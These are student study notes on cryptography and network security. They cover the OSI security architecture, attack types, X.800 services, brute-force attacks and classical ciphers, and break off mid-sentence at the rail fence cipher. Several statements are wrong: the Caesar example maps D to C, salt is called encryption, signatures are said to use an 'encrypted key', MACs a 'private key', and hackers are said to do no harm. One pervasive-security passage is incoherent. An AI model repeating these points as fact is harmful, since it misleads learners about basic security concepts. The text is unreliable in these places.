1.

INTRODUCTION
CRYPTOLOGY:
cryptology, science concerned with data communication and storage in secure and usually
secret form. In other words, this is the study of techniques for ensuring security and
authenticity of information. It encompasses both cryptography and cryptanalysis (main
branches).
CRYPTOGRAPHY:
Cryptography is technique of securing information and communications through use of
codes so that only those person for whom the information is intended can understand it
and process it. Thus preventing unauthorized access to information. The prefix “crypt”
means “hidden” and suffix graphy means “writing”.
CRYPT ANALYSIS:
Cryptanalysis which is the study of the cryptographic algorithm and the breaking of those
secret codes. The person practicing Cryptanalysis is called a Cryptanalyst. It helps us to
better understand the cryptosystems and also helps us improve the system by finding any
weak point and thus work on the algorithm to create a more secure secret code. For
example, a Cryptanalyst might try to decipher a ciphertext to derive the plaintext. It can
help us to deduce the plaintext or the encryption key.
NETWORK SECURITY:
Network Security refers to the measures taken by any enterprise or organization to
secure its computer network and data using both hardware and software systems. This
aims at securing the confidentiality and accessibility of the data and network. Every
company or organization that handles a large amount of data, has a degree of solutions
against many cyber threats.
The most basic example of Network Security is password protection which the user of the
network oneself chooses.

Q1: OSI Security Architecture:

The OSI security architecture provides the managers responsible for the security of an
organization in describing the necessity for security. The OSI security architecture was
introduced as an ‘international standard’ which allow the computer and communication dealer
produce the products that have security characteristics depends on this architecture.
The OSI security architecture has a structure description of services and structure for
supporting security to the organization’s data. The OSI security architecture targets on
security attacks, structure, and services.
These can be represented concisely as follows −
Security attack − Security attack is any action that deal the security of data owned by an
organization.
Security mechanism − A process (or a device assortment such a process) that is designed
to identify, avoid, or restore from a security attack.
Security service − A processing or communication service that improves the security of the
data processing systems and the information assign of an organization. The services are pre-
determined to counter security attacks, and they create need of one or more security structure
to support the service.

SECURITY ATTACKS (2 TYPES 1. PASSIVE & 2. ACTIVE)

Passive attacks: A Passive attack attempts to learn or make use of information from the
system but does not affect system resources. Passive Attacks are in the nature of
eavesdropping on or monitoring transmission. The goal of the opponent is to obtain
information that is being transmitted. Types of Passive attacks are as follows:
• The release of message content
• Traffic analysis
The release of message content –
Telephonic conversation, an electronic mail message, or a transferred file may contain
sensitive or confidential information. We would like to prevent an opponent from learning the
contents of these transmissions.

Passive attack

Traffic analysis –
Suppose that we had a way of masking (encryption) information, so that the attacker even if
captured the message could not extract any information from the message.

Traffic analysis
The opponent could determine the location and identity of communicating host and could
observe the frequency and length of messages being exchanged. This information might be
useful in guessing the nature of the communication that was taking place.
The most useful protection against traffic analysis is encryption of SIP traffic. To do this, an
attacker would have to access the SIP proxy (or its call log) to determine who made the call.

Active attacks: An Active attack attempts to alter system resources or affect their
operations. Active attacks involve some modification of the data stream or the creation of
false statements. Types of active attacks are as follows:
• Masquerade
• Modification of messages
• Repudiation
• Replay
• Denial of Service
Masquerade –
A masquerade attack takes place when one entity pretends to be a different entity. A
Masquerade attack involves one of the other forms of active attacks. If an authorization
procedure isn’t always absolutely protected, it is able to grow to be extraordinarily liable to
a masquerade assault. Masquerade assaults may be performed using the stolen passwords
and logins, with the aid of using finding gaps in programs, or with the aid of using locating a
manner across the authentication process.

Masquerade Attack

Modification of messages –

Modification of messages
It means that some portion of a message is altered or that message is delayed or reordered
to produce an unauthorized effect. Modification is an attack on the integrity of the original
data. It basically means that unauthorized parties not only gain access to data but also spoof
the data by triggering denial-of-service attacks, such as altering transmitted data packets or
flooding the network with fake data. Manufacturing is an attack on authentication. For
example, a message meaning “Allow JOHN to read confidential file X” is modified as “Allow
Smith to read confidential file X”.

Replay –
It involves the passive capture of a message and its subsequent transmission to produce an
authorized effect. In this attack, the basic aim of the attacker is to save a copy of the data
originally present on that particular network and later on use this data for personal uses.
Once the data is corrupted or leaked it is insecure and unsafe for the users.

Replay

Denial of Service –
It prevents the normal use of communication facilities. This attack may have a specific target.
For example, an entity may suppress all messages directed to a particular destination.
Another form of service denial is the disruption of an entire network either by disabling the
network or by overloading it with messages so as to degrade performance.

Denial of Service
SECURITY MECHANISMS:
• specific security mechanisms
• Pervasive security mechanisms

specific security mechanisms

A process (or a device compilation such a process) that is designed to identify, avoid, or
restore from a security attack. The mechanisms are divided into those that are performed in
a definite protocol layer, including TCP or an application-layer protocol. These mechanisms
are known as specific security mechanisms.
These can be integrated into the relevant protocol layer in order to support some of the OSI
security services. There are some approaches for realizing security are as follows −
• Encipherment − This is the procedure of using numerical algorithms to change
data into a form that is not freely intelligible. The transformation and subsequent
recovery of the information based on an algorithm and zero or higher encryption
keys.
• Digital Signature − A digital signature is an analytical approach which validates
the authenticity and integrity of a message, application or digital records. It
allows us to test the author name, date and time of signatures, and verify the
message text.
The digital signature supports far more basic security and designed to solve the
problem of tampering and impersonation (deliberately copy another person's
features) in electronic connection.
Data or cryptographic transformation of an information unit is additional to the
data, therefore that the recipient of the information unit is converted of the
source and integrity of the information unit and this can also serve to secure the
data against forgery (such as by the recipient).
• Access Control − Access control is an information security process that
enables organizations to manage who is authorized to access corporate data
and resources.
Secure access control need policies that check users are who they claim to be
and support proper control access levels are allowed to users. There are
several structure are available that accomplish access rights to resources.
• Data Integrity − Integrity can use to a flow of messages, an individual
message, or selected areas inside a message. In data integrity, it is a
connection-oriented integrity service, it can handle with a flow of messages, and
assure that messages are received as sent with no duplication, insertion,
modification, reordering, or replays.
There are several structure that can be used to encourage the integrity of a data
unit or flow of data units.
• Authentication Exchange − This is a structure intended to provide the integrity
of an entity by means of information exchange.
• Traffic Padding − The insertion of bits into gaps in an information flow is known
as traffic padding. This provide to counter traffic analysis attempts.
• Routing Control − Routing control allows selection of specific physically
secure routes for specific data transmission and enables routing changes,
particularly when a gap of security is suspected.
• Notarization − This is the usage of a trusted third party to assure specific
properties of an information exchange.
Pervasive security mechanisms
The structure are divided into those that are performed in a definite protocol layer, including
TCP or an software-layer protocol and those that are not definite to any specific protocol layer
or security service. These structure are also called a pervasive security mechanisms.
Pervasive security is supported by a set of physical interfaces and network interfaces to a
service to a user contains creating by the user's client device network connectivity to the
service, broadcasting by the service an identifier to the user's client device.
It can be deciding by the service whether the user introduce the identifier into the service in
physical closeness to the service, and appeal to the service because the user has entered
the identifier into the service while in physical closeness to the service.
Pervasive secure access is being able to recognize risk at each interaction point, using
several means (identifying anomalies in client behavior, or considering contextual clues such
as location and device, etc.) and asking client for promote authentication when the level of
risk ensure it.
This risk-based method supports the opportunity to step up to multi-factor authentication when
allocate but doesn’t demand more authentication and when it’s not warranted. It provides that
access is both secure enough to secure the organization and useful suitable to minimize
friction for users.
The service can support expression that the service has been allowed by sending a control
page to the user's client device. These are the structure that are not specific to some specific
OSI security service or protocol layer.
There are some mechanisms can also be regarded as an element of security management
which are as follows −
• Trusted Functionality − The process that which is recognized to be correct
regarding some criteria such as established by a security policy.
• Security Label − This is an approach of marking of a constrained to a resource
(which can be a data unit) that label or designates the security nature of that
resource.
• Event Detection − Detection of security-relevant events including forgery,
denial of sending or receiving of information, modification of information etc.
• Security Audit Trail − It supports a valuable security mechanism, as possibly
they allow detection and analysis of breaches of security by allowing a
subsequent security audit.
A security audit is an independent report and investigation of system data and
events in order to test for sufficiency of system controls, to provide compliance
with established policy and operational processes, to help in loss assessment
and to approve some indicated changes in controls, policy and processes.
• Security Recovery − This negotiate with requests from mechanisms, including
event managing and executive functions, and takes recovery conduct.

SECURITY SERVICES:
There are various security services which are as follows −
Message Confidentiality − The principle of confidentiality defines that only the sender and
the intended recipient should be capable to create the element of the message. It protects the
transmitted data from passive attack.
Confidentiality can be used at several levels on the basis of content of an information to be
transmitted. There are the following types of confidentiality which are as follows −
 o Connection Confidentiality − The protection of all user
information on a connection.
o Connectionless Confidentiality − The security of all user data
in an individual data block.
o Selective field Confidentiality – It is within the user data on a
connection or in a single data block.
o Traffic-flow Confidentiality − The protection of the information
that can be derived from observation of traffic flows.
Authentication − The authentication service is concerned with likely that a connection is
authentic. In the case of a single message, including a warning or alarm signal, the function
of the authentication service is to persuade the recipient that the message is from the source
that it declare to be from.
In the case of an ongoing interaction, such as the connection of a terminal to a host, two
aspects are involved. First, at the time of connection initiation, the service assures that the
two entities are authentic, that is, that each is the entity that it claims to be. Second, the
service must assure that the connection is not interfered with in such a way that a third party
can masquerade as one of the two legitimate parties for the purposes of unauthorized
transmission or reception.

Two specific authentication services are defined in X.800:

• Peer entity authentication: Provides for the corroboration of the identity of a peer
entity in an association. Two entities are considered peers if they implement to same
protocol in different systems; e.g., two TCP mod-ules in two communicating systems. Peer
entity authentication is provided for use at the establishment of, or at times during the data
transfer phase of, a connection. It attempts to provide confidence that an entity is not
performing either a masquerade or an unauthorized replay of a previous connection.

• Data origin authentication: Provides for the corroboration of the source of a data unit.
It does not provide protection against the duplication or modification of data units. This type
of service supports applications like electronic mail, where there are no prior interactions
between the commu-nicating entities.

Non-repudiation − Nonrepudiation avoids either sender or receiver from adverse a

transmitted message. Therefore, when a message is sent, the receiver can validate that the
asserted sender actually sent the message.
Likewise, when a message is received, the sender can validate that the asserted receiver
actually received the message.
Non-repudiation uses cryptography, similar to digital signatures, and comprises
authentication, auditing, and logging services. Non-repudiation can be accomplished in a
variety of methods, such as the digital signing of log data as a checksum during collection or
using secured storage media.
In Data Audit Logs
Typically, a digital signature supplied in a hash algorithm is computed against the log file at
the time of collection. The output of this computation is a checksum that is used to verify that
the files have not been manipulated. If the file is updated in any manner, the hash generates
a different value, and the log file fails the integrity check. If the checksum is correct, the log is
confirmed to be in its original state.
In Online Transactions
In online transactions, Digital signatures guarantee that a party cannot subsequently dispute
delivering information or question the legitimacy of its signature in online transactions. A
digital signature is formed by pairing an encrypted key and a public key. Only the holder of
the encrypted key has access to this key and can generate this signature, confirming that that
holder electronically signed a document, which assures that a person cannot subsequently
dispute supplying the signature, hence ensuring non-repudiation.
In Cryptography
Message authentication code (MAC), also called a tag in cryptography, is used for
authentication of messages or to certify that the message originated from the specified sender
and was not altered along the route. MAC values, unlike digital signatures, are created and
confirmed using the same private key, on which the sender and receiver must agree before
commencing interactions.
A MAC can prevent message forging by anybody who does not have access to the shared
secret key, ensuring both integrity and authenticity. Non-repudiation cannot be provided by
MAC methods such as block cipher-based MAC (CMAC) and hash-based MAC (HMAC).
In Digital Contracts and Email
A signatory of an email on one side of communication cannot deny sending the message,
and the receiver cannot deny receiving it. Email non-repudiation entails techniques such as
email monitoring.
In E-commerce
To aid in conflict resolutions of any kind, Non-repudiation is implemented. It gives confirmation
that a message was received and recognised by the receiver. E-Commerce site security is
crucial for a variety of reasons, including protecting consumers' privacy and sensitive data on
a website, securing an online business's funds, and avoiding fraud and financial scams.
In Business-to-Business Transactions
Non-repudiation is also used in B2B transactions. Non-repudiation allows your business to
verify that it received or sent a message from or to a trade partner if a trading partner
repudiates the transmission or receiving of messages or receipts. Non-repudiation entails two
degrees of security, which are as follows −
• Non-repudiation of received or sent communications - Both the transmitting and
receiving parties keep the message exchanged (the business document and
any attachments) in its original format. The transmitting message service
handler (MSH) saves a message before sending it, and the receiving MSH
saves a message before processing it.
• Non-repudiation of receipts issued after a message is received - A receipt is
sent by the receiver of a message to acknowledge receipt of a message. You
can exchange a signed receipt, which adds another layer of protection. Signed
receipts allow you to confirm the legitimacy of the replying company or individual
as well as the content integrity.
A Non-Repudiation-Information element is included in the receipt when signed
communications are exchanged with a trade partner. The non-repudiation element includes
the message digest transmitted to the trade partner. The sender compares the digest to the
original message to verify that the message content was not altered during transmission by
an attacker.
Access Control − The principle of access control decides who should be capable to access
information or system through communication link. It supports the avoidance of unauthorized
use of a resource.

Data Integrity − Data integrity is designed to secure information from modification, insertion,
deletion and rehashing by any entity. Data integrity can be used to a flow of message, an
individual message or a selected portion inside a message. Data integrity can be used to
support total stream protection.
There are various types of data integrity which are as follows −
o Connection integrity with recovery − It supports for the
integrity of all user information on a connection and identify any
modification, insertion, deletion or replay of any information
within a whole data sequence, with recovery attempted.
o Connection integrity without recovery − It supports only detection
without recovery.
o Selective-field connection integrity − It supports for the
principle of selected areas within the user information of a data
block shared over a connection and creates the form of decision
of whether the selected fields have been changed, inserted,
removed or replayed.
o Connectionless integrity − It supports for the integrity of an
individual connectionless data block and can take the form of
detection of data modification. Moreover, it is a limited form of
replay detection can be provided.
o Selective-field connectionless integrity − It supports for the
integrity of selected fields within an individual connectionless
data block and takes the form of determination of whether the
selected areas have been changed.

Q2: NETWORK SECURITY ISSUES, THREATS AND SOLUTIONS:

We all seem to fall into one or more of these habits over time, so to help remind us all of what
we need to look out for, therefore we have some common network security issues and
solutions.
1. Non-complex or Weak Network Access Passwords Most network system
administrators are open to an “old school” exploit known as brute forcing. In order to
correct this network security password vulnerability, they have implemented
“CAPTCHA Technology.” A common type of CAPTCHA requires the user to type
letters or digits from a distorted image that appears on screen, which is commonly
used to prevent unwanted internet bots from accessing websites and networks. This
technology has given network security administrators a false sense of security, in
regard to countering brute forcing.
The solution for the above issue is a complex password. In order to create a complex
password, you need seven or more characters combined with at least three numbers
and one special character (capita letters,@ or # signs, etc.).
Network security administrators should require the creation of complex passwords as
well as implement a password expiration system to help remind users to change their
passwords often. A restriction on how soon a password can be reused is also another
handy precaution, that way someone isn’t cycling between two different passwords
every month or so.
2. Outdated Server Application or Software Companies constantly release patches
in order to ensure that our system is not vulnerable to new public threats. Hackers
 consistently release new threats and exploits which could allow harm to befall our
network if these patches are not in place. A simple solution is to ensure our system
administrator is regularly informed of new threats and is updating our applications on
a monthly basis.
3. Web Cookies Although cookies do not carry viruses and cannot install malware on
the host computer, the tracking of cookies and third-party tracking cookies are
commonly used ways to compile records of individuals’ browsing histories.
Unencrypted cookies are a major network security issue because they can open our
system to a XSS (Cross Site Scripting) vulnerability and that is a major privacy
concern. With ‘Open Cookies’ anyone could have access to any login data cookies
(saved password sessions) on the network, which creates a major vulnerability on our
network security system. The solution is to ensure all of our network cookies are
encrypted and have an encoded expiration time. our network administrator should also
force users to re-login any time they are accessing sensitive directories in our network.
4. Plain Hashes "Anyone who knows their stuff can decrypt a Hash that is not Salted".
Hashing is used to index and retrieve items in a database and Plain Hashes are also
used in many encryption algorithms. A Salt (which is another type of encryption) is
added to Hashes in order to make a lookup table assisted Directory Attack (or Brute-
Force) impractical or extremely difficult, provided the Salt is large enough. Basically,
an attacker wouldn’t be able to use a pre-computed look up table to assist in exploiting
our network, which adds a whole new level of complexity to our network security
system. So even if an attacker gains access and compromises our database (table), it
will still be very difficult for the attacker to retrieve the information. The best way to
ensure safety in regard to Hashes is for our network administrator to hide the Salt (or
encryption key), because if the hacker is able to gain access to our Salt encryption
they can access our network system. Salt all of our Hashes. No Salt means no security.
5. Share Hosting (not Cloud Server Base) suppose we are running a legitimate
business and have a website with access to our internal network, Shared Hosting is
not the way to go! A shared web hosting service is where many websites reside on
one web server connected to the Internet. Each site sits on its own partition, or section
or space on the server, to keep it separate from other sites. This is generally the most
economical option for hosting, because people share the overall cost of server
maintenance. Think of it this way: shared hosting is like sharing a house with other
people, and if someone breaks into our roommate’s bedroom or any other area of the
home for that matter, they’ll also be able to access our own room!
This same concept is applied to Shared Hosting. When an attacker is inside one area
of the shared server, it’s almost as if they have a skeleton key that fits all of the locks.
The best solution is to have dedicated Server Hosting and/or Secure Cloud Hosting.

Q3: Network Security Model

A Network Security Model exhibits how the security service has been designed over the
network to prevent the opponent from causing a threat to the confidentiality or authenticity of
the information that is being transmitted through the network.

In this section, we will be discussing the general ‘network security model’ where we will
study how messages are shared between the sender and receiver securely over the
network. And we will also discuss the ‘network access security model’ which is designed
to secure your system from unwanted access through the network
For a message to be sent or receive there must be a sender and a receiver. Both the sender
and receiver must also be mutually agreeing to the sharing of the message. Now, the
transmission of a message from sender to receiver needs a medium i.e. Information
channel which is an Internet service.

A logical route is defined through the network (Internet), from sender to the receiver and
using the communication protocols both the sender and the receiver established
communication.

Well, we are concerned about the security of the message over the network when the
message has some confidential or authentic information which has a threat from an
opponent present at the information channel. Any security service would have the three
components discussed below:

1. Transformation of the information which has to be sent to the receiver. So, that any
opponent present at the information channel is unable to read the message. This indicates
the encryption of the message. It also includes the addition of code during the
transformation of the information which will be used in verifying the identity of the authentic
receiver.

2. Sharing of the secret information between sender and receiver of which the opponent
must not any clue. Yes, we are talking of the encryption key which is used during the
encryption of the message at the sender’s end and also during the decryption of message at
receiver’s end.

3. There must be a trusted third party which should take the responsibility of distributing
the secret information (key) to both the communicating parties and also prevent it from any
opponent.

Now we will study a general network security model with the help of the figure given below:

The network security model presents the two communicating

parties sender and receiver who mutually agrees to exchange the information. The sender
has information to share with the receiver. But sender cannot send the message on the
information cannel in the readable form as it will have a threat of being attacked by the
opponent. So, before sending the message through the information channel, it should
be transformed into an unreadable format.

Secret information is used while transforming the message which will also be required
when the message will be retransformed at the recipient side. That’s why a trusted third
party is required which would take the responsibility of distributing this secret information to
both the parties involved in communication.

So, considering this general model of network security, one must consider the following four
tasks while designing the security model.

1. To transform a readable message at the sender side into an unreadable format, an

appropriate algorithm should be designed such that it should be difficult for an opponent to
crack that security algorithm.

2. Next, the network security model designer is concerned about the generation of the
secret information which is known as a key.
This secret information is used in conjunction with the security algorithm in order to
transform the message.

3. Now, the secret information is required at both the ends, sender’s end and receiver’s end.
At sender’s end, it is used to encrypt or transform the message into unreadable form and at
the receiver’s end, it is used to decrypt or retransform the message into readable form.
So, there must be a trusted third party which will distribute the secret information to both
sender and receiver. While designing the network security model designer must also
concentrate on developing the methods to distribute the key to the sender and receiver.
An appropriate methodology must be used to deliver the secret information to the
communicating parties without the interference of the opponent.

It is also taken care that the communication protocols that are used by the communicating
parties should be supporting the security algorithm and the secret key in order to achieve the
security service.

Till now we have discussed the security of the information or message over the network.
Now, we will discuss the network access security model which is designed to secure the
information system which can be accessed by the attacker through the network.

You are well aware of the attackers who attack your system that is accessible through the
internet. These attackers fall into two categories:

1. Hacker: The one who is only interested in penetrating into your system. They do not
cause any harm to your system they only get satisfied by getting access to your system.

2. Intruders: These attackers intend to do damage to your system or try to obtain the
information from the system which can be used to attain financial gain.

The attacker can place a logical program on your system through the network which can
affect the software on your system. This leads to two kinds of risks:

a. Information threat: This kind of threats modifies data on the user’s behalf to which
actually user should not access. Like enabling some crucial permission in the system.
b. Service threat: This kind of threat disables the user from accessing data on the system.
 2. CLASSICAL ENCRYPTION TECHNIQUES

Q1: Symmetric Cipher Model

Symmetric Encryption is the most basic and old method of encryption. It uses only one key
for the process of both the encryption and decryption of data. Thus, it is also known as
Single-Key Encryption.
A few basic terms in Cryptography are as follows:
Plain Text: original message to be communicated between sender and receiver
Cipher Text: encoded format of the original message that cannot be understood by humans
Encryption (or Enciphering): the conversion of plain text to cipher text
Decryption (or Deciphering): the conversion of cipher text to plain text, i.e., reverse of
encryption

The Symmetric Cipher Model:

A symmetric cipher model is composed of five essential parts:

1. Plain Text (x): This is the original data/message that is to be communicated to the
receiver by the sender. It is one of the inputs to the encryption algorithm.
2. Secret Key (k): It is a value/string/textfile used by the encryption and decryption algorithm
to encode and decode the plain text to cipher text and vice-versa respectively. It is
independent of the encryption algorithm. It governs all the conversions in plain text. All the
substitutions and transformations done depend on the secret key.
3. Encryption Algorithm (E): It takes the plain text and the secret key as inputs and
produces Cipher Text as output. It implies several techniques such as substitutions and
transformations on the plain text using the secret key.
E(x, k) = y
4. Cipher Text (y): It is the formatted form of the plain text (x) which is unreadable for
humans, hence providing encryption during the transmission. It is completely dependent
upon the secret key provided to the encryption algorithm. Each unique secret key produces
a unique cipher text.
5. Decryption Algorithm (D): It performs reversal of the encryption algorithm at the
recipient’s side. It also takes the secret key as input and decodes the cipher text received
from the sender based on the secret key. It produces plain text as output.
D(y, k) = x

Requirements for Encryption:

There are only two requirements that need to be met to perform encryption. They are,
1. Encryption Algorithm: There is a need for a very strong encryption algorithm that
produces cipher texts in such a way that the attacker should be unable to crack the secret
key even if they have access to one or more cipher texts.
2. Secure way to share Secret Key: There must be a secure and robust way to share the
secret key between the sender and the receiver. It should be leakproof so that the attacker
cannot access the secret key.

Cryptography
Cryptographic systems are characterized along three independent dimensions:

1. The type of operations used for transforming plaintext to ciphertext. All encryption
algorithms are based on two general principles: substitution, in which each element in the
plaintext (bit, letter, group of bits or letters) is mapped into another element, and transposition,
in which elements in the plaintext are rearranged. The fundamental requirement is that no
informa-tion be lost (that is, that all operations are reversible). Most systems, referred to
as product systems, involve multiple stages of substitutions and transpositions.

2. The number of keys used. If both sender and receiver use the same key, the system
is referred to as symmetric, single-key, secret-key, or conventional encryp-tion. If the sender
and receiver use different keys, the system is referred to as asymmetric, two-key, or public-
key encryption.

3. The way in which the plaintext is processed. A block cipher processes the input one
block of elements at a time, producing an output block for each input block. A stream
cipher processes the input elements continuously, producing output one element at a time,
as it goes along.

Q2: Brute Force Attack

A brute force attack is a hacking method that uses trial and error to crack passwords, login
credentials, and encryption keys. It is a simple yet reliable tactic for gaining unauthorized
access to individual accounts and organizations’ systems and networks. The hacker tries
multiple usernames and passwords, often using a computer to test a wide range of
combinations, until they find the correct login information.

The name "brute force" comes from attackers using excessively forceful attempts to gain
access to user accounts. Despite being an old cyberattack method, brute force attacks are
tried and tested and remain a popular tactic with hackers.
Types of Brute Force Attacks

There are various types of brute force attack methods that allow attackers to gain
unauthorized access and steal user data.
1. Simple Brute Force Attacks

A simple brute force attack occurs when a hacker attempts to guess a user’s login
credentials manually without using any software. This is typically through standard password
combinations or personal identification number (PIN) codes.

These attacks are simple because many people still use weak passwords, such as
"password123" or "1234," or practice poor password etiquette, such as using the same
password for multiple websites. Passwords can also be guessed by hackers that do minimal
reconnaissance work to crack an individual's potential password, such as the name of their
favorite sports team.
2. Dictionary Attacks

A dictionary attack is a basic form of brute force hacking in which the attacker selects a
target, then tests possible passwords against that individual’s username. The attack method
itself is not technically considered a brute force attack, but it can play an important role in a
bad actor’s password-cracking process.

The name "dictionary attack" comes from hackers running through dictionaries and
amending words with special characters and numbers. This type of attack is typically time-
consuming and has a low chance of success compared to newer, more effective attack
methods.
3. Hybrid Brute Force Attacks

A hybrid brute force attack is when a hacker combines a dictionary attack method with a
simple brute force attack. It begins with the hacker knowing a username, then carrying out a
dictionary attack and simple brute force methods to discover an account login combination.

The attacker starts with a list of potential words, then experiments with character, letter, and
number combinations to find the correct password. This approach allows hackers to discover
passwords that combine common or popular words with numbers, years, or random
characters, such as "SanDiego123" or "Rover2020."
4. Reverse Brute Force Attacks

A reverse brute force attack sees an attacker begin the process with a known password,
which is typically discovered through a network breach. They use that password to search
for a matching login credential using lists of millions of usernames. Attackers may also use a
commonly used weak password, such as "Password123," to search through a database of
usernames for a match.
5. Credential Stuffing

Credential stuffing preys on users’ weak password etiquettes. Attackers collect username
and password combinations they have stolen, which they then test on other websites to see
if they can gain access to additional user accounts. This approach is successful if people
use the same username and password combination or reuse passwords for various
accounts and social media profiles.
Q3: Substitution Methods:

The two basic building blocks of all encryption techniques are substitution and transposition.
Substitution technique is a classical encryption approach where the characters present in the
initial message are restored by the other characters or numbers or by symbols. If the plain
text (original message) is treated as the string of bits, thus the substitution technique would
restore bit pattern of plain text with the bit pattern of cipher text.
There are various types of substitution ciphers which are as follows –
• Caesar Cipher
• Monoalphabetic Ciphers
• Playfair Cipher
• Hill Cipher
• Polyalphabetic Ciphers
Caesar Cipher or Shift Cipher:

The Caesar cipher is the simplest and oldest method of cryptography. The Caesar cipher
method is based on a mono-alphabetic cipher and is also called a shift cipher or additive
cipher. Julius Caesar used the shift cipher (additive cipher) technique to communicate with his
officers. For this reason, the shift cipher technique is called the Caesar cipher. The Caesar
cipher is a kind of replacement (substitution) cipher, where all letter of plain text is replaced by
another letter.

Let's take an example to understand the Caesar cipher, suppose we are shifting with 1, then
A will be replaced by B, B will be replaced by C, C will be replaced by D, D will be replaced by
C, and this process continues until the entire plain text is finished.

Caesar ciphers is a weak method of cryptography. It can be easily hacked. It means the
message encrypted by this method can be easily decrypted.

Plaintext: It is a simple message written by the user.

Ciphertext: It is an encrypted message after applying some technique.
The formula of encryption is:
En (x) = (x + n) mod 26
The formula of decryption is:
Dn (x) = (xi - n) mod 26

If any case (Dn) value becomes negative (-ve), in this case, we will add 26 in the negative
value. Where,
E denotes the encryption
D denotes the decryption
x denotes the letters value
n denotes the key value (shift value)
 Example: 2 Use the Caesar cipher to encrypt and decrypt the message "HELLO," and the
key (shift) value of this message is 15.

Encryption

We apply encryption formulas by character, based on alphabetical order.

The formula of encryption is:

En (x) = (x + n) mod 26

Plaintext: H → 07 En: (07 + 15) mod 26 Ciphertext: 22 → W

Plaintext: E → 04 En: (04 + 15) mod 26 Ciphertext: 19 → T

Plaintext: L → 11 En: (11 + 15) mod 26 Ciphertext: 00 → A

Plaintext: L → 11 En: (11 + 15) mod 26 Ciphertext: 00 → A

Plaintext: O → 14 En: (14 + 15) mod 26 Ciphertext: 03 → D

Note that the Caesar cipher is monoalphabetic, so the same plaintext letters are encrypted as
the same letters. Like, "HELLO" has "L", encrypted by "A".

The encrypted message of this plain text is "WTAAD".

Decryption

We apply decryption formulas by character, based on alphabetical order.

The formula of decryption is:

Dn (x) = (xi - n) mod 26

Ciphertext: W → 22 Dn: (22 - 15) mod 26 Plaintext: 07 → H

Ciphertext: T → 19 Dn: (19 - 15) mod 26 Plaintext: 04 → E

Ciphertext: A → 00 Dn: (00 - 15) mod 26 Plaintext: 11 → L

Ciphertext: A → 00 Dn: (00 - 15) mod 26 Plaintext: 11 → L

Ciphertext: D → 03 Dn: (03 - 15) mod 26 Plaintext: 14 → O

The decrypted message is "HELLO".

Note: If any case (Dn) value becomes negative (-ve), in this case, we will add 26 in the negative
value. Like, the third letter of the ciphertext.
Dn = (00-15) mod 26 = -15
The value of dn is negative, so 26 will be added to it.
= -15+26 = 11

Monoalphabetic Ciphers:
A monoalphabetic cipher is any cipher in which the letters of the plain text are mapped to
cipher text letters based on a single alphabetic key. Examples of monoalphabetic ciphers
would include the Caesar-shift cipher, where each letter is shifted based on a numeric key,
and the atbash cipher, where each letter is mapped to the letter symmetric to it about the
center of the alphabet.
There are various techniques of Monoalphabetic cipher which are as follows – (**Refer Notes)
• Additive Cipher
• Multiplicative Cipher
• Affine Cipher

Playfair Cipher:
The Playfair cipher was the first practical digraph substitution cipher. In playfair cipher
unlike traditional cipher we encrypt a pair of alphabets(digraphs) instead of a single
alphabet.
It was used for tactical purposes by British forces in the Second Boer War and in World War
I and for the same purpose by the Australians during World War II. This was because
Playfair is reasonably fast to use and requires no special equipment.
The Playfair Cipher Encryption Algorithm:
The Algorithm consists of 2 steps:

1. Generate the key Square(5×5):

• The key square is a 5×5 grid of alphabets that acts as the key for
encrypting the plaintext. Each of the 25 alphabets must be unique
and one letter of the alphabet (usually J) is omitted from the table (as
the table can hold only 25 alphabets). If the plaintext contains J, then
it is replaced by I.

• The initial alphabets in the key square are the unique alphabets of
the key in the order in which they appear followed by the remaining
letters of the alphabet in order.

2. Algorithm to encrypt the plain text: The plaintext is split into pairs of two
letters (digraphs). If there is an odd number of letters, a Z is added to the last
letter.
For example:
PlainText: "instruments" After Split: 'in' 'st' 'ru' 'me' 'nt' 'sz'

***For Ex (Refer Notebook)

Hill Cipher:
Hill cipher is a polygraphic substitution cipher based on linear algebra.Each letter is
represented by a number modulo 26. Often the simple scheme A = 0, B = 1, …, Z = 25 is
used, but this is not an essential feature of the cipher. To encrypt a message, each block of
n letters (considered as an n-component vector) is multiplied by an invertible n × n matrix,
against modulus 26. To decrypt the message, each block is multiplied by the inverse of the
matrix used for encryption.
The matrix used for encryption is the cipher key, and it should be chosen randomly from the
set of invertible n × n matrices (modulo 26).
(*** refer NESO Academy for Ex.)

Polyalphabetic Ciphers:

the simple monoalphabetic technique is to use different monoalphabetic substitutions as one

proceeds through the plaintext message. The general name for this approach is
polyalphabetic substitution cipher.

All these techniques have the following features in common:

1. A set of related monoalphabetic substitution rules is used.
2. A key determines which particular rule is chosen for a given transformation.

2 Types of Polyalphabetic Ciphers

• Auto-Key: Autokey Cipher is a polyalphabetic substitution cipher. It is closely

related to the Vigenere cipher but uses a different method of generating the key. It
was invented by Blaise de Vigenère in 1586. In general, more secure than the
vigenere cipher .

(*** Refer Notes for ex )

• Vigenere cipher:
Formula of encryption is,
Ei = (Pi + Ki) mod 26
Formula of decryption is,
Di = (Ei - Ki) mod 26
If any case (Di) value becomes negative (-ve), in this case, we will add 26 in the
negative value.
Where,
E denotes the encryption.
D denotes the decryption.
 P denotes the plaintext.
K denotes the key.

Example: The plaintext is "JAVATPOINT", and the key is "BEST".

Encryption: Ei = (Pi + Ki) mod 26

Plaintext J A V A T P O I N T

Plaintext value (P) 09 00 21 00 19 15 14 08 13 19

Key B E S T B E S T B E

Key value (K) 01 04 18 19 01 04 18 19 01 04

Ciphertext value (E) 10 04 13 19 20 19 06 01 14 23

Ciphertext K E N T U T G B O X

Decryption: Di = (Ei - Ki) mod 26

If any case (Di) value becomes negative (-ve), in this case, we will add 26 in the
negative value. Like, the third letter of the ciphertext;

N = 13 and S = 18

Di = (Ei - Ki) mod 26

Di = (13 - 18) mod 26
Di = -5 mod 26
Di = (-5 + 26) mod 26
Di = 21

Ciphertext K E N T U T G B O X

Ciphertext value (E) 10 04 13 19 20 19 06 01 14 23

Key B E S T B E S T B E

Key value (K) 01 04 18 19 01 04 18 19 01 04

Plaintext value (P) 09 00 21 00 19 15 14 08 13 19

Plaintext J A V A T P O I N T
Q4: Transposition Techniques:
In cryptography, a transposition cipher is a method of encryption by which the positions held
by units of plaintext (which are commonly characters or groups of characters) are shifted
according to a regular system, so that the ciphertext constitutes a permutation of the
plaintext. That is, the order of the units is changed. Mathematically a bijective function is
used on the characters' positions to encrypt and an inverse function to decrypt.
Those are 2 techniques:
1. Reil Fence Cipher
2. Route Cipher
1. Reil Fence Cipher:
The Rail Fence cipher is a form of transposition cipher that gets its name from the way in
which it is encoded. In the rail fence cipher, the plaintext is written downwards on successive
"rails" of an imaginary fence, then moving up when we get to the bottom. The message is
